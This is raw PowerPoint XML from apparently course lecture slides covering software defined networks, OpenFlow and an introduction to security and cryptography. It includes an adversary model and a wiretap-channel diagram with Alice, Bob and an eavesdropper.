          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3655531" y="3442855"/>
            <a:ext cx="995459" cy="4051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B2E3ADF-64C4-3945-A21C-BAE9D9442E7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6944383" y="3700714"/>
            <a:ext cx="800308"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98D2C36-9214-F74A-B412-2BC03525EE7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5775276" y="4307513"/>
            <a:ext cx="0" cy="3299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369C0E5-2259-CB4C-87FB-A3786BC8C440}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3981210" y="5041394"/>
            <a:ext cx="0" cy="3299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4347B4F-14AE-1740-A7A7-78B5D4CBB04E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1699899" y="5109386"/>
            <a:ext cx="0" cy="3299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0347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53272" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Software defined networks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441008" y="1813810"/>
            <a:ext cx="11003280" cy="4430766"/>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A SDN is a framework to allow automatic, dynamic management and control of network devices, services, topology, traffic paths, and packet handling using high-level languages and APIs.  SDN’s are used in most cloud data centers.</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Openflow popularized SDNs.  It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>enables network controllers to determine the path of network packets across a network of switches using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="TimesNewRomanPS"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>flow tables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="TimesNewRomanPSMT"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>at each network element (switch, router). These tables track message characteristics and tie specified identifiers to specified actions. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OpenFlow allows remote administration of a layer 3   switch's packet forwarding tables, by adding, modifying and removing packet matching rules and actions. [extracted from Wikipedia]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="TimesNewRomanPSMT"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="TimesNewRomanPSMT"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="TimesNewRomanPSMT"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> for an early description.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="TimesNewRomanPSMT"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1530524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13983"/>
            <a:ext cx="11305622" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Software and networking part 4, security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1662545"/>
            <a:ext cx="10817942" cy="4854447"/>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Isolation and sandboxing</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Provisioning and configuration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Updating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Writing secure software</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Cryptography and secure communications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The adversary</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Confidentiality and integrity</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Public key and symmetric cryptography</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Cryptographic hashes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Implementing “Trusted computing” primitives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Software as a security principal</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Measure, isolate, seal, unseal, attest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US"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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3836601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BA6AF2-DE1A-49CD-930B-E5AA3E0D8F02}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="98854" y="55873"/>
            <a:ext cx="11817022" cy="865267"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659084" y="1551709"/>
            <a:ext cx="10743210" cy="4732977"/>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Configuration, Access Control and auditing</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Who are authorized security principals (users, software)?</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How are they authenticated (e.g.-by password challenges or, better, cryptographic mechanism)</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What operations can each authenticated user carry out.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Audit:  How do we ensure security critical operations are logged for forensics.</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Data and communications security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Confidentiality: How is data or communications protected (usually by encryption)?</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Integrity:  How do we ensure that data, communications, configurations and programs have not been modified.</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Availability:  How do we ensure that important operations make progress and run when needed.</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Software security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2897634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BA6AF2-DE1A-49CD-930B-E5AA3E0D8F02}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909301" y="197414"/>
            <a:ext cx="9183914" cy="1186543"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security and cryptography</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654907" y="1620982"/>
            <a:ext cx="11052184" cy="4663704"/>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Cryptography is computing in the presence of an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>adversary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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An adversary is characterized by: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Talent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2"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Nation state: assume infinite intelligence.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2"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Wealthy, unscrupulous criminal: not much less.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Access to information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2"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Cipher-text only, probable plaintext attacks, known plaintext/ciphertext attacks, chosen plaintext attacks, adaptive interactive, chosen plaintext attacks (oracle model).</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Computational resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5244149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9CE0E7BB-961A-4DBF-A1B0-F8B31ECBB37E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741405" y="259493"/>
            <a:ext cx="10814413" cy="946153"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The wiretap channel: “In the beginning”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Oval 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143002" y="2256983"/>
            <a:ext cx="2209798" cy="70468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18438" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3825876" y="2345808"/>
            <a:ext cx="1057274" cy="489461"/>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18439" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239001" y="2345808"/>
            <a:ext cx="1142999" cy="489433"/>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18441" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="3521075"/>
            <a:ext cx="1073150" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Key (K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18442" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7408863" y="3470276"/>
            <a:ext cx="10731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Key (K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18443" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="4006333"/>
            <a:ext cx="2286000" cy="369332"/>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18444" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410201" y="4038600"/>
            <a:ext cx="1466235" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Eavesdropper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18447" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2606675"/>
            <a:ext cx="457200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18448" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8382000" y="2590800"/>
            <a:ext cx="457200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18452" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7924800" y="2835276"/>
            <a:ext cx="0" cy="669925"/>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18453" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1498394" y="2395221"/>
            <a:ext cx="1517650" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Plaintext (P)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18454" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="2606675"/>
            <a:ext cx="2286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18455" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="1997075"/>
            <a:ext cx="1457450" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Noisy insecure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>channel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18456" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6172200" y="2606676"/>
            <a:ext cx="0" cy="1355725"/>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18457" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="2376488"/>
            <a:ext cx="958850" cy="366712"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18458" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7300975" y="2409087"/>
            <a:ext cx="1104899"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Decrypt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18459" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="1447800"/>
            <a:ext cx="13779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The Sender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18460" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686800" y="1524000"/>
            <a:ext cx="15430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The Receiver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Bob</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18461" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9258299" y="2409087"/>
            <a:ext cx="1679573" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Plaintext (P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
